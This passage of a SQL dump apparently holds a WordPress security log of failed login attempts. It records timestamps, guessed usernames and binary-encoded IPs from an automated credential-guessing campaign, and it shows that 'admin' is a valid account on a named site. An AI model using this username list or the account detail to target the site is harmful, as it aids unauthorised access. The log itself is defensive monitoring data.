rv:62.0) Gecko/20100101 Firefox/62.0'),(49,49,1624410339.834488,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��\'a�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(50,50,1624412864.303485,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��*Š','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(51,51,1624412865.524381,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��*Š','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(52,52,1624414191.097698,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��gbH','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(53,53,1624415408.048240,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0���B�Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(54,54,1624415411.043767,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���B�Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(55,55,1624416674.916795,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0���і,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(56,56,1624416676.189265,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���і,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(57,57,1624420537.755201,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��j��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(58,58,1624420544.831760,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��j��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(59,59,1624422283.441036,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(60,60,1624422335.568429,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(61,61,1624422395.903654,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(62,66,1624422882.624744,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��F#ŕ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(63,67,1624422952.096872,1,'loginFailInvalidUsername','xrumertest',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(64,67,1624422952.107666,1,'loginFailInvalidUsername','xrumertest',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(65,68,1624423201.616803,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(66,69,1624423314.558927,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��^2\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(67,70,1624423381.738099,1,'loginFailInvalidUsername','tester',0,'\0\0\0\0\0\0\0\0\0\0����9d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(68,75,1624424003.400993,1,'loginFailInvalidUsername','testtest',0,'\0\0\0\0\0\0\0\0\0\0��_�E�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(69,76,1624424060.512337,1,'loginFailInvalidUsername','test1',0,'\0\0\0\0\0\0\0\0\0\0���i�9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(70,77,1624424192.002572,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0���FzC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(71,77,1624424192.046412,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0���FzC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(72,78,1624424273.295507,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(73,79,1624424307.782899,1,'loginFailInvalidUsername','user2',0,'\0\0\0\0\0\0\0\0\0\0��MO�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(74,80,1624424373.745520,1,'loginFailInvalidUsername','test2',0,'\0\0\0\0\0\0\0\0\0\0����9d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(75,81,1624424428.131137,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0���<�#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(76,82,1624424512.348238,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0����\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(77,83,1624424570.402818,1,'loginFailInvalidUsername','123',0,'\0\0\0\0\0\0\0\0\0\0���~A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(78,86,1624424952.429796,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0���i�9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(79,87,1624425034.093829,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ɷC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(80,89,1624425324.737962,1,'loginFailInvalidUsername','username',0,'\0\0\0\0\0\0\0\0\0\0���>[�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(81,90,1624425384.146897,1,'loginFailInvalidUsername','teste',0,'\0\0\0\0\0\0\0\0\0\0���FzC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(82,93,1624425854.889993,1,'loginFailInvalidUsername','1234',0,'\0\0\0\0\0\0\0\0\0\0��-7<n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(83,99,1624426532.119627,1,'loginFailInvalidUsername','seamus',0,'\0\0\0\0\0\0\0\0\0\0���z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(84,99,1624426532.135877,1,'loginFailInvalidUsername','seamus',0,'\0\0\0\0\0\0\0\0\0\0���z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(85,103,1624426791.919841,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��Xc�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(86,104,1624426862.981872,1,'loginFailInvalidUsername','teste',0,'\0\0\0\0\0\0\0\0\0\0��co�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(87,105,1624426911.264713,1,'loginFailInvalidUsername','AnonymousFox',0,'\0\0\0\0\0\0\0\0\0\0��V?F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(88,108,1624427122.114085,1,'loginFailInvalidUsername','patricia',0,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(89,109,1624427251.990436,1,'loginFailInvalidUsername','john',0,'\0\0\0\0\0\0\0\0\0\0��j��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(90,110,1624427304.868682,1,'loginFailInvalidUsername','tester',0,'\0\0\0\0\0\0\0\0\0\0��z�mm','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(91,118,1624428165.684357,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(92,120,1624428473.362533,1,'loginFailInvalidUsername','1234567890',0,'\0\0\0\0\0\0\0\0\0\0��\r}\nJ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(93,120,1624428473.396071,1,'loginFailInvalidUsername','1234567890',0,'\0\0\0\0\0\0\0\0\0\0��\r}\nJ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(94,121,1624428543.469234,1,'loginFailInvalidUsername','preview',0,'\0\0\0\0\0\0\0\0\0\0��>m	y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(95,122,1624428734.032878,1,'loginFailInvalidUsername','patricia',0,'\0\0\0\0\0\0\0\0\0\0���ɧ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(96,123,1624428953.750193,1,'loginFailInvalidUsername','admin2',0,'\0\0\0\0\0\0\0\0\0\0���z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(97,124,1624429063.621417,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��z�mm','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(98,125,1624429131.970591,1,'loginFailInvalidUsername','info',0,'\0\0\0\0\0\0\0\0\0\0��V?F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(99,136,1624430384.890807,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��ɔk_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(100,136,1624430384.913782,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��ɔk_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(101,137,1624430566.431374,1,'loginFailInvalidUsername','sophie',0,'\0\0\0\0\0\0\0\0\0\0���Lk�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(102,140,1624431106.398579,1,'loginFailInvalidUsername','admin123',0,'\0\0\0\0\0\0\0\0\0\0���;��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(103,141,1624431163.256826,1,'loginFailInvalidUsername','cliente',0,'\0\0\0\0\0\0\0\0\0\0���A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(104,142,1624431264.743947,1,'loginFailInvalidUsername','post123',0,'\0\0\0\0\0\0\0\0\0\0���ɧ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(105,143,1624431413.725009,1,'loginFailInvalidUsername','duozhandian',0,'\0\0\0\0\0\0\0\0\0\0���&V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(106,144,1624431493.532135,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;E�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(107,147,1624431954.566096,1,'loginFailInvalidUsername','admin1',0,'\0\0\0\0\0\0\0\0\0\0���FzC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(108,149,1624432213.560660,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��Xc�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(109,151,1624432393.879534,1,'loginFailInvalidUsername','wpupdateuser',0,'\0\0\0\0\0\0\0\0\0\0�����0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(110,152,1624432609.244290,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Xc�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(111,154,1624432755.286232,1,'loginFailInvalidUsername','badmin',0,'\0\0\0\0\0\0\0\0\0\0���H@a','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(112,155,1624433086.568145,1,'loginFailInvalidUsername','soolking',0,'\0\0\0\0\0\0\0\0\0\0���&V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(113,165,1624434747.152522,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��\"�F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(114,168,1624435032.854609,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(115,171,1624435343.408304,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(116,172,1624435427.118492,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(117,174,1624435603.773475,1,'loginFailInvalidUsername','view',0,'\0\0\0\0\0\0\0\0\0\0����2<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(118,176,1624435943.080447,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����9d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(119,177,1624436000.613232,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Lk�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(120,179,1624436144.825173,1,'loginFailInvalidUsername','test1',0,'\0\0\0\0\0\0\0\0\0\0��Xc�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(121,180,1624436294.309272,1,'loginFailInvalidUsername','john',0,'\0\0\0\0\0\0\0\0\0\0��\'a�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(122,181,1624436348.881522,1,'loginFailInvalidUsername','testing',0,'\0\0\0\0\0\0\0\0\0\0��z�mm','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(123,182,1624436493.369565,1,'loginFailInvalidUsername','seller2',0,'\0\0\0\0\0\0\0\0\0\0���G�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(124,198,1624438214.311021,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����ɢ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(125,200,1624438694.673286,1,'loginFailInvalidUsername','developer',0,'\0\0\0\0\0\0\0\0\0\0���_l�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(126,201,1624438764.394137,1,'loginFailInvalidUsername','kiki',0,'\0\0\0\0\0\0\0\0\0\0���i�9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(127,201,1624438764.447100,1,'loginFailInvalidUsername','kiki',0,'\0\0\0\0\0\0\0\0\0\0���i�9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(128,202,1624438824.617326,1,'loginFailInvalidUsername','martin',0,'\0\0\0\0\0\0\0\0\0\0���A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(129,207,1624439377.529752,1,'loginFailInvalidUsername','author',0,'\0\0\0\0\0\0\0\0\0\0���B�Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(130,208,1624439428.321972,1,'loginFailInvalidUsername','ron',0,'\0\0\0\0\0\0\0\0\0\0�����&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(131,208,1624439428.375955,1,'loginFailInvalidUsername','ron',0,'\0\0\0\0\0\0\0\0\0\0�����&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(132,211,1624440106.408359,1,'loginFailInvalidUsername','admindemo',0,'\0\0\0\0\0\0\0\0\0\0���ɠ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(133,212,1624440243.510222,1,'loginFailInvalidUsername','press',0,'\0\0\0\0\0\0\0\0\0\0��\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(134,215,1624440437.893031,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���b�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(135,219,1624440982.996803,1,'loginFailInvalidUsername','frank',0,'\0\0\0\0\0\0\0\0\0\0��\"�F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(136,220,1624441040.507289,1,'loginFailInvalidUsername','subscriber',0,'\0\0\0\0\0\0\0\0\0\0��-O#(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(137,222,1624441664.925153,1,'loginFailInvalidUsername','one',0,'\0\0\0\0\0\0\0\0\0\0��o��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(138,226,1624442177.379475,1,'loginFailInvalidUsername','username',0,'\0\0\0\0\0\0\0\0\0\0��\r~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(139,229,1624442754.000895,1,'loginFailInvalidUsername','quantri',0,'\0\0\0\0\0\0\0\0\0\0���&V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(140,230,1624442974.351473,1,'loginFailInvalidUsername','raja',0,'\0\0\0\0\0\0\0\0\0\0���G�R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(141,231,1624443166.390300,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6$�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(142,236,1624443715.204529,1,'loginFailInvalidUsername','peter',0,'\0\0\0\0\0\0\0\0\0\0��V?F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(143,238,1624443996.041352,1,'loginFailInvalidUsername','testuser111',0,'\0\0\0\0\0\0\0\0\0\0��Xcڌ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(144,241,1624444493.264475,1,'loginFailInvalidUsername','maxaa2',0,'\0\0\0\0\0\0\0\0\0\0��-O#(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(145,242,1624444549.819985,1,'loginFailInvalidUsername','kenneth',0,'\0\0\0\0\0\0\0\0\0\0��-O#(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(146,246,1624444973.660465,1,'loginFailInvalidUsername','thiquyen',0,'\0\0\0\0\0\0\0\0\0\0���&V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(147,247,1624445021.597931,1,'loginFailInvalidUsername','thiquyen',0,'\0\0\0\0\0\0\0\0\0\0���#p�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(148,248,1624445335.496487,1,'loginFailInvalidUsername','cristina',0,'\0\0\0\0\0\0\0\0\0\0��^2\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(149,252,1624445917.488715,1,'loginFailInvalidUsername','jojo',0,'\0\0\0\0\0\0\0\0\0\0���YY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(150,255,1624446313.449761,1,'loginFailInvalidUsername','usuario',0,'\0\0\0\0\0\0\0\0\0\0���Dx1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(151,256,1624446445.031231,1,'loginFailInvalidUsername','thanhxuan',0,'\0\0\0\0\0\0\0\0\0\0���8�T','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(152,257,1624446564.117847,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��gbH','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(153,257,1624446564.205505,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��gbH','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(154,259,1624446973.776929,1,'loginFailInvalidUsername','sample',0,'\0\0\0\0\0\0\0\0\0\0��co�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(155,260,1624447105.080602,1,'loginFailInvalidUsername','admin123',0,'\0\0\0\0\0\0\0\0\0\0��>m	y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(156,261,1624447273.648879,1,'loginFailInvalidUsername','wangchao',0,'\0\0\0\0\0\0\0\0\0\0���\\z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(157,262,1624447324.781256,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(158,263,1624447425.119859,1,'loginFailInvalidUsername','khanhlinh',0,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(159,274,1624449236.574812,1,'loginFailInvalidUsername','thuynhung',0,'\0\0\0\0\0\0\0\0\0\0���0Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(160,275,1624449376.623923,1,'loginFailInvalidUsername','Jayden_Collins',0,'\0\0\0\0\0\0\0\0\0\0��N/u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(161,276,1624449453.574800,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(162,277,1624449544.617470,1,'loginFailInvalidUsername','antz',0,'\0\0\0\0\0\0\0\0\0\0��r��>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(163,280,1624449873.942832,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��\"�F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(164,281,1624449955.843818,1,'loginFailInvalidUsername','anna',0,'\0\0\0\0\0\0\0\0\0\0��|��+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(165,282,1624450008.231833,1,'loginFailInvalidUsername','vivreavec',0,'\0\0\0\0\0\0\0\0\0\0���Dx1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(166,283,1624450098.732662,1,'loginFailInvalidUsername','givenname',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(167,287,1624450864.702760,1,'loginFailInvalidUsername','bigikala',0,'\0\0\0\0\0\0\0\0\0\0��h�*�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(168,292,1624451517.085592,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ɠ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(169,293,1624451657.940650,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���0Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(170,293,1624451657.949457,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���0Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(171,294,1624451946.775992,1,'loginFailInvalidUsername','secure',0,'\0\0\0\0\0\0\0\0\0\0���0Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(172,296,1624452236.880745,1,'loginFailInvalidUsername','maxas',0,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(173,297,1624452272.007056,1,'loginFailInvalidUsername','testing',0,'\0\0\0\0\0\0\0\0\0\0��N/u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(174,297,1624452272.051292,1,'loginFailInvalidUsername','testing',0,'\0\0\0\0\0\0\0\0\0\0��N/u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(175,298,1624452366.434407,1,'loginFailInvalidUsername','qwer0304',0,'\0\0\0\0\0\0\0\0\0\0����2<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(176,302,1624452714.205026,1,'loginFailInvalidUsername','mosaic',0,'\0\0\0\0\0\0\0\0\0\0��-O#(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(177,304,1624452944.784098,1,'loginFailInvalidUsername','dan',0,'\0\0\0\0\0\0\0\0\0\0���ń�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(178,304,1624452944.818203,1,'loginFailInvalidUsername','dan',0,'\0\0\0\0\0\0\0\0\0\0���ń�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 